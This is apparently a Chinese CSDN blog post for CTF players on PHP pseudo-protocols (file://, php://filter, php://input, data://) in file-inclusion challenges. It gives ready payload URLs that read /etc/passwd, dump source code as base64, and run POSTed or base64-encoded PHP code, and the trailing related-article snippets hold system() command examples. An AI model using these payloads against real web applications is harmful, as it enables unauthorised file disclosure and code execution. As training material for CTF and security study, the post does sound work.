CTF中常用的php伪协议利用

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量938 收藏 9
点赞数 1
分类专栏: CTF-web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53146913/article/details/124053999
版权

file://

作用:

用于访问文件(绝对路径、相对路径、网络路径)

示例:

http://www.xx.com?file=file:///etc/passswd

php://

作用:访问输入输出流

1. php://filter

作用:

读取源代码并进行base64编码输出

示例:

http://xxx.x.x.x/cmd.php?cmd=php://filter/read=convert.base64-encode/resource=[文件名](针对php文件需要base64编码)

参数:

resource=<要过滤的数据流> 这个参数是必须的。它指定了你要筛选过滤的数据流
read=<读链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
<;两个链的筛选列表> 任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

2. php://input

作用:

执行POST数据中的php代码

示例:

http://xxx.x.x.x/cmd.php?cmd=php://input

POST数据:<?php phpinfo()?>

注意:

enctype="multipart/form-data" 的时候 php://input 是无效的

Example:

  • php://filter用于读取源码
  • php://input用于执行php代码

所以下面采用filter来读源码,但上面提到过针对php文件需要base64编码,所以使用其自带的base64过滤器。

?file=php://filter/read=convert.base64-encode/resource=useless.php

data://

作用:

data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。一般需要用到base64编码传输

示例:

http://xxx.x.x.x/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

菜菜zhao
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHub php://input
人若无名,便可专心练剑
08-16 417
用于读取源码用于执行php代码。
CTFHub笔记之技能树RCE:eval执行、文件包含、远程包含、php://input、读取源代码
weixin_48799157的博客
03-28 4557
小白一个,如有错误请指正! 一、eval执行 ?cmd=system("ls"); ?cmd=system("ls%20/"); ?cmd=system("cat%20/flag_26396");
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
最新发布
2401_84208172的博客
05-24 1327
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
PHP Filter 伪协议
weixin_55710577的博客
06-05 1967
php filter 伪协议
base解码_php://filter在一次CTFbase被过滤的利用
weixin_39565910的博客
11-27 875
0x00 简介在一次线下ctf的web题有一道关于php://filter伪协议利用0x01题目分析靶机环境http://192.168.1.151:88/flag.php 存放flag信息的http://192.168.1.151:88/index.php 注释有include1.phpinclude1代码如下error_reporting(0); @$file = $_G...
ctf常用PHP伪协议
weixin_35756637的博客
01-02 723
CTF比赛,常常会使用PHP伪协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP伪协议有几种常见的形式: data: 协议 这种形式的PHP伪协议常用于在HTML嵌入PHP代码,例如: <imgsrc="data:image/png;base64,PHP_CODE_HERE"> php: 协议 这种形式的PHP伪协议常用于在浏览器执行PHP代码,例如:...
PHP 伪协议大总结.docx
02-24
,`php://filter`和`php://input`是CTF竞赛常用的功能。 ##### 2. 配置要求 - `allow_url_fopen`: 可以设置为`on`或`off`。 - `allow_url_include`: 对于`php://input`、`php://stdin`、`php://memory`和`...
【技术分享】ctfphp的一些trick .pdf
09-05
总结来说,CTF比赛PHP技巧主要集在理解和利用PHP的超全局变量、文件操作函数、伪协议以及配置选项。了解这些知识可以帮助参赛者发现并利用潜在的安全漏洞,同时也提醒开发者在编写PHP代码时要注意这些安全风险...
PHP反序列化漏洞详解.rar
02-07
这个话题在CTF(Capture The Flag)网络安全竞赛也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将详细阐述PHP反序列化漏洞的相关知识点。 **1. PHP序列化与反序列化** - **...
CTF Web各种题目的解题姿势
07-27
课时10:文件包含介绍-伪协议phpfilter利用04'54 课时11:日志文件利用07'58 课时12:日志文件利用session会话利用17'43 第4章 SSRF 课时1:SSRF介绍与简单利用19'14 课时2:SSRF限制绕过策略13'07 课时3:...
ctf总结.md
05-14
考虑php伪协议读取源码, 然后利用这一点,可以读取到你想获取的页面的源码例如: index.php,flag.php,login.php的源码,然后base64解密 url里?后面改成这个?file=...
Web安全之PHP伪协议漏洞利用,以及伪协议漏洞防护方法
Scalzdp的专栏
11-13 2144
单纯看伪协议利用与之前的文件包含漏洞及其相似,但是在真实环境是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程对于使用了伪协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
http
cinderella8的博客
05-18 3万+
我们以前搭当当网,搭bbs的时候,我们常用的是192.168.x.xx:8080/dangdang,我们很少看到www,www是外网上面的,而192.168.x.xx:8080/dangdang是内网,外网www.baidu.com/xxxxx,内网用192.168.x.xx:8080/dangdang,外网用www.baidu.com/xxxxx,www.baidu.com = xx.xxx.xx.xx:8080(IP地址:端口号),这个www.baidu.com我们叫它域名,一般我们人为是记不住ip地址
CTFHub】 RCE - php://input
cx_sam的博客
08-09 579
CTF WEB RCE php://input
报错 | Access to XMLHttpRequest at ‘http://www.xxxxxxx.cn/xxxxx/xxxxx/xxxxx/login‘ from origin
热门推荐
A123ppleQueen的博客
11-22 45万+
Access to XMLHttpRequest at 'http://www.xxxxxxx.cn/xxxxx/xxxxx/xxxxx/login' from origin 'http://xx.x.x.xx:xxxx' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is pre
【网络安全 | CTF】攻防世界 fileclude 解题详析(php伪协议
等风来
07-31 4513
代码功能:检查通过GET请求传递的两个参数"file1"和"file2"。如果这两个参数都存在且非空,它将读取"file2"文件的内容,如果内容等于"hello ctf",则会执行"file1"文件。对于file1,我们可以使用 convert.base64-encode 过滤器来读取位于 flag.php 文件的内容,并将其转换为 base64 编码的形式。php://input 是一个 PHP 的内置流(stream)封装器,用于从请求的正文(body)获取原始的输入数据。
利用file权限读取/etc/passwd
weixin_34309543的博客
12-27 1848
欢迎关注MySQL 8.0必知必会系列课程。 MySQL8.0必知必会-自动化部署 https://edu.51cto.com/course/16368.html MySQL8.0必知必会之参数标准化配置 https://edu.51cto.com/course/16358.html1 背景介绍把OS的文件导入到数据库2、语法...
CTF遇见的PHP伪协议运用
byxs007的博客
12-15 1万+
关于PHP伪协议的总结网上已经有很多文章了 LoRexxar的PHP伪协议总结 PHP伪协议 官方文档 以下都是在做CTF题目的时候遇见的一些知识点,每遇到一点就会在这面做一些总结 php://input php://input 是个可以访问请求的原始数据的只读流。因为它不依赖于特定的 php.ini 指令。 注:enctype=”multipart/form-d
PHP伪协议与文件包含漏洞分析 - Zad的博客园实战
**PHP伪协议**: 在文件包含漏洞,攻击者可能会尝试使用PHP伪协议,例如`file://`、`data://`、`phar://`等,来绕过文件路径的限制。例如,`file://`可以用来读取本地文件,`data://`可以传递Base64编码的数据,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值